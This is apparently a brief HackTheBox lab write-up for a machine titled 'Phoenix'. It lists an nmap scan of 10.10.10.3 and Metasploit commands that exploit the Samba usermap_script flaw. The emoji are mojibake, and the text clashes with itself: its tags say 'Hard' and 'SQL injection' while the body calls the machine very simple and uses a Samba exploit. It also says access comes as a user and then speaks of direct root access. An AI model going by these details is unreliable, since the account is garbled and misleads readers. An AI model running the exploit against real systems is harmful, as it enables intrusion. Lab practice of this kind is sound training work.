π§ HTB - Phoenix
π Enumeration
Initial scan:
nmap -sC -sV 10.10.10.3
π‘ Services detected
-FTP -SSH
- Samba (β οΈ vulnerable)
π₯ Exploitation
Vulnerability detected in Samba (usermap_script)
msfconsole
use exploit/multi/samba/usermap_script
set RHOSTS 10.10.10.3
run
βοΈ Access achieved as a user
π Privilege Escalation
No complex climbing necessary.
The system is misconfigured and allows direct root access.
π Conclusion
Very simple machine:
- Ideal for beginners
- Introduces basic operating concepts
- Good first contact with HackTheBox
π·οΈ Tags
- #HTB
- #Hard
- #Sql
- #Sql-Injection